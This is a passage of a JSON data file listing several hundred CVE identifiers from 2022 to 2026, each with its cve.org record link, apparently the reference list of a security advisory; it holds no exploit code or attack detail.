"name": "CVE-2023-53804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53804"
},
{
"name": "CVE-2023-54149",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54149"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2023-53797",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53797"
},
{
"name": "CVE-2023-53863",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53863"
},
{
"name": "CVE-2023-54131",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54131"
},
{
"name": "CVE-2023-54142",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54142"
},
{
"name": "CVE-2025-40156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40156"
},
{
"name": "CVE-2022-50779",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50779"
},
{
"name": "CVE-2023-54000",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54000"
},
{
"name": "CVE-2023-54052",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54052"
},
{
"name": "CVE-2023-54111",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54111"
},
{
"name": "CVE-2023-54186",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54186"
},
{
"name": "CVE-2025-68286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68286"
},
{
"name": "CVE-2023-53803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53803"
},
{
"name": "CVE-2022-50641",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50641"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2023-53754",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53754"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2023-54091",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54091"
},
{
"name": "CVE-2025-40055",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40055"
},
{
"name": "CVE-2023-54083",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54083"
},
{
"name": "CVE-2023-54280",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54280"
},
{
"name": "CVE-2022-50834",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50834"
},
{
"name": "CVE-2025-40314",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40314"
},
{
"name": "CVE-2025-40306",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40306"
},
{
"name": "CVE-2022-50809",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50809"
},
{
"name": "CVE-2023-54270",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54270"
},
{
"name": "CVE-2023-53821",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53821"
},
{
"name": "CVE-2025-40048",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40048"
},
{
"name": "CVE-2023-53799",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53799"
},
{
"name": "CVE-2025-37751",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37751"
},
{
"name": "CVE-2025-40254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40254"
},
{
"name": "CVE-2023-54021",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54021"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2023-54201",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54201"
},
{
"name": "CVE-2025-40219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40219"
},
{
"name": "CVE-2025-68200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68200"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68176"
},
{
"name": "CVE-2025-68204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68204"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2022-50630",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50630"
},
{
"name": "CVE-2025-68380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68380"
},
{
"name": "CVE-2022-50672",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50672"
},
{
"name": "CVE-2023-54309",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54309"
},
{
"name": "CVE-2022-50776",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50776"
},
{
"name": "CVE-2025-68339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68339"
},
{
"name": "CVE-2025-40287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40287"
},
{
"name": "CVE-2023-53995",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53995"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2023-54255",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54255"
},
{
"name": "CVE-2023-54018",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54018"
},
{
"name": "CVE-2023-54271",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54271"
},
{
"name": "CVE-2022-50702",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50702"
},
{
"name": "CVE-2023-53786",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53786"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2022-50761",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50761"
},
{
"name": "CVE-2022-50866",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50866"
},
{
"name": "CVE-2023-54297",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54297"
},
{
"name": "CVE-2025-40019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40019"
},
{
"name": "CVE-2023-54112",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54112"
},
{
"name": "CVE-2025-68287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68287"
},
{
"name": "CVE-2025-40240",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40240"
},
{
"name": "CVE-2025-71135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71135"
},
{
"name": "CVE-2025-40081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40081"
},
{
"name": "CVE-2023-54313",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54313"
},
{
"name": "CVE-2023-53759",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53759"
},
{
"name": "CVE-2025-68746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68746"
},
{
"name": "CVE-2023-53845",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53845"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2023-53994",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53994"
},
{
"name": "CVE-2025-40153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40153"
},
{
"name": "CVE-2022-50622",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50622"
},
{
"name": "CVE-2025-40121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40121"
},
{
"name": "CVE-2025-40312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40312"
},
{
"name": "CVE-2025-40204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40204"
},
{
"name": "CVE-2023-54095",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54095"
},
{
"name": "CVE-2025-40171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40171"
},
{
"name": "CVE-2025-21738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21738"
},
{
"name": "CVE-2023-54143",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54143"
},
{
"name": "CVE-2025-68238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68238"
},
{
"name": "CVE-2025-68297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68297"
},
{
"name": "CVE-2023-53813",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53813"
},
{
"name": "CVE-2023-54227",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54227"
},
{
"name": "CVE-2022-50646",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50646"
},
{
"name": "CVE-2023-53855",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53855"
},
{
"name": "CVE-2022-50853",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50853"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2025-40139",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40139"
},
{
"name": "CVE-2023-54100",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54100"
},
{
"name": "CVE-2023-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53864"
},
{
"name": "CVE-2025-40350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40350"
},
{
"name": "CVE-2025-40309",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40309"
},
{
"name": "CVE-2025-40349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40349"
},
{
"name": "CVE-2023-54246",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54246"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2025-38243",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38243"
},
{
"name": "CVE-2025-40343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40343"
},
{
"name": "CVE-2023-54001",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54001"
},
{
"name": "CVE-2025-38563",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38563"
},
{
"name": "CVE-2023-54253",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54253"
},
{
"name": "CVE-2022-50619",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50619"
},
{
"name": "CVE-2025-21658",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21658"
},
{
"name": "CVE-2025-38375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38375"
},
{
"name": "CVE-2025-68307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68307"
},
{
"name": "CVE-2025-40308",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40308"
},
{
"name": "CVE-2023-54324",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54324"
},
{
"name": "CVE-2023-54106",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54106"
},
{
"name": "CVE-2025-40187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40187"
},
{
"name": "CVE-2025-40315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40315"
},
{
"name": "CVE-2023-53793",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53793"
},
{
"name": "CVE-2023-54213",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54213"
},
{
"name": "CVE-2023-54096",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54096"
},
{
"name": "CVE-2022-50636",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50636"
},
{
"name": "CVE-2025-39913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39913"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-40251",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40251"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-40355",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40355"
},
{
"name": "CVE-2023-54283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54283"
},
{
"name": "CVE-2023-53837",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53837"
},
{
"name": "CVE-2023-54049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54049"
},
{
"name": "CVE-2024-36357",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36357"
},
{
"name": "CVE-2025-40107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40107"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2023-54066",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54066"
},
{
"name": "CVE-2025-40115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40115"
},
{
"name": "CVE-2023-54117",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54117"
},
{
"name": "CVE-2023-53999",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53999"
},
{
"name": "CVE-2024-54031",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54031"
},
{
"name": "CVE-2023-54038",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54038"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2023-54315",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54315"
},
{
"name": "CVE-2023-54010",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54010"
},
{
"name": "CVE-2022-50774",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50774"
},
{
"name": "CVE-2025-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39689"
},
{
"name": "CVE-2022-50878",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50878"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2023-54211",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54211"
},
{
"name": "CVE-2023-54251",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54251"
},
{
"name": "CVE-2022-50836",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50836"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2023-54156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54156"
},
{
"name": "CVE-2022-50644",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50644"
},
{
"name": "CVE-2022-50846",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50846"
},
{
"name": "CVE-2023-54098",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54098"
},
{
"name": "CVE-2023-53750",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53750"
},
{
"name": "CVE-2025-71076",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71076"
},
{
"name": "CVE-2022-50842",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50842"
},
{
"name": "CVE-2025-40347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40347"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2023-54037",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54037"
},
{
"name": "CVE-2023-54275",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54275"
},
{
"name": "CVE-2023-52923",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52923"
},
{
"name": "CVE-2023-53815",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53815"
},
{
"name": "CVE-2025-40198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40198"
},
{
"name": "CVE-2022-50668",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50668"
},
{
"name": "CVE-2025-68257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68257"
},
{
"name": "CVE-2023-53818",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53818"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2023-54031",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54031"
},
{
"name": "CVE-2025-40173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40173"
},
{
"name": "CVE-2022-50840",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50840"
},
{
"name": "CVE-2023-54305",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54305"
},
{
"name": "CVE-2025-40190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40190"
},
{
"name": "CVE-2022-50756",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50756"
},
{
"name": "CVE-2023-53989",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53989"
},
{
"name": "CVE-2023-54150",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54150"
},
{
"name": "CVE-2023-54199",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54199"
},
{
"name": "CVE-2025-68347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68347"
},
{
"name": "CVE-2025-39944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39944"
},
{
"name": "CVE-2025-68235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68235"
},
{
"name": "CVE-2025-68770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68770"
},
{
"name": "CVE-2025-40202",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40202"
},
{
"name": "CVE-2025-40311",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40311"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2023-54254",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54254"
},
{
"name": "CVE-2025-38565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38565"
},
{
"name": "CVE-2024-26581",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26581"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2023-54312",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54312"
},
{
"name": "CVE-2023-52433",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52433"
},
{
"name": "CVE-2023-54094",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54094"
},
{
"name": "CVE-2022-50700",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50700"
},
{
"name": "CVE-2022-50821",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50821"
},
{
"name": "CVE-2025-40167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40167"
},
{
"name": "CVE-2025-38159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38159"
},
{
"name": "CVE-2023-54110",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54110"
},
{
"name": "CVE-2022-50881",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50881"
},
{
"name": "CVE-2025-37744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37744"
},
{
"name": "CVE-2023-54205",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54205"
},
{
"name": "CVE-2023-53846",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53846"
},
{
"name": "CVE-2023-53866",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53866"
},
{
"name": "CVE-2025-40194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40194"
},
{
"name": "CVE-2023-53792",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53792"
},
{
"name": "CVE-2023-54164",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54164"
},
{
"name": "CVE-2025-40256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40256"
},
{
"name": "CVE-2025-71080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71080"
},
{
"name": "CVE-2025-71142",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71142"
},
{
"name": "CVE-2024-56721",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56721"
},
{
"name": "CVE-2025-40360",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40360"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2025-38068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38068"
},
{
"name": "CVE-2023-54316",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54316"
},
{
"name": "CVE-2022-50724",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50724"
},
{
"name": "CVE-2022-50633",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50633"
},
{
"name": "CVE-2025-40097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40097"
},
{
"name": "CVE-2025-68258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68258"
},
{
"name": "CVE-2023-54089",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54089"
},
{
"name": "CVE-2025-40001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40001"
},
{
"name": "CVE-2022-50859",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50859"
},
{
"name": "CVE-2022-50750",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50750"
},
{
"name": "CVE-2022-50726",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50726"
},
{
"name": "CVE-2023-54016",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54016"
},
{
"name": "CVE-2023-54035",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54035"
},
{
"name": "CVE-2025-40322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40322"
},
{
"name": "CVE-2025-68209",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68209"
},
{
"name": "CVE-2022-50814",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50814"
},
{
"name": "CVE-2025-39859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39859"
},
{
"name": "CVE-2023-54040",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54040"
},
{
"name": "CVE-2025-71138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71138"
},
{
"name": "CVE-2023-54214",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54214"
},
{
"name": "CVE-2025-40233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40233"
},
{
"name": "CVE-2023-54322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54322"
},
{
"name": "CVE-2025-40172",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40172"
},
{
"name": "CVE-2023-54155",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54155"
},
{
"name": "CVE-2023-54088",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54088"
},
{
"name": "CVE-2023-54090",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54090"
},
{
"name": "CVE-2025-40188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40188"
},
{
"name": "CVE-2025-40271",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
},
{
"name": "CVE-2023-54276",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54276"
},
{
"name": "CVE-2023-53755",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53755"
},
{
"name": "CVE-2023-42752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42752"
},
{
"name": "CVE-2025-40186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40186"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2023-54079",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54079"
},
{
"name": "CVE-2023-54048",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54048"
},
{
"name": "CVE-2023-54202",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54202"
},
{
"name": "CVE-2023-54007",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54007"
},
{
"name": "CVE-2023-54278",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54278"
},
{
"name": "CVE-2023-54215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54215"
},
{
"name": "CVE-2025-68308",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68308"
},
{
"name": "CVE-2023-54024",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54024"
},
{
"name": "CVE-2023-53777",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53777"
},
{
"name": "CVE-2022-50781",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50781"
},
{
"name": "CVE-2023-54133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54133"
},
{
"name": "CVE-2022-50860",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50860"
},
{
"name": "CVE-2025-40242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40242"
},
{
"name": "CVE-2022-50649",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50649"
},
{
"name": "CVE-2023-54148",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54148"
},
{
"name": "CVE-2025-21764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21764"
},
{
"name": "CVE-2025-68190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68190"
},
{
"name": "CVE-2022-50829",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50829"
},
{
"name": "CVE-2023-54064",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54064"
},
{
"name": "CVE-2023-54153",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54153"
},
{
"name": "CVE-2025-40169",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40169"
},
{
"name": "CVE-2022-50830",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50830"
},
{
"name": "CVE-2025-40252",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40252"
},
{
"name": "CVE-2022-50673",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50673"
},
{
"name": "CVE-2023-53791",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53791"
},
{
"name": "CVE-2025-68218",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68218"
},
{
"name": "CVE-2023-53848",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53848"
},
{
"name": "CVE-2025-68255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68255"
},
{
"name": "CVE-2023-54081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54081"
},
{
"name": "CVE-2023-54274",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54274"
},
{
"name": "CVE-2023-53828",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53828"
},
{
"name": "CVE-2025-40024",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40024"
},
{
"name": "CVE-2022-50666",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50666"
},
{
"name": "CVE-2025-40238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40238"
},
{
"name": "CVE-2023-54185",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54185"
},
{
"name": "CVE-2023-54108",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54108"
},
{
"name": "CVE-2022-50745",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50745"
},
{
"name": "CVE-2025-21766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21766"
},
{
"name": "CVE-2025-40277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40277"
},
{
"name": "CVE-2025-40070",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40070"
},
{
"name": "CVE-2023-54317",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54317"
},
{
"name": "CVE-2025-37813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37813"
},
{
"name": "CVE-2022-50736",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50736"
},
{
"name": "CVE-2025-40106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40106"
},
{
"name": "CVE-2022-50740",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50740"
},
{
"name": "CVE-2025-68174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68174"
},
{
"name": "CVE-2025-40272",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40272"
},
{
"name": "CVE-2023-54298",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54298"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2022-50822",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50822"
},
{
"name": "CVE-2025-68759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68759"
},
{
"name": "CVE-2025-40136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40136"
},
{
"name": "CVE-2023-53834",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53834"
},
{
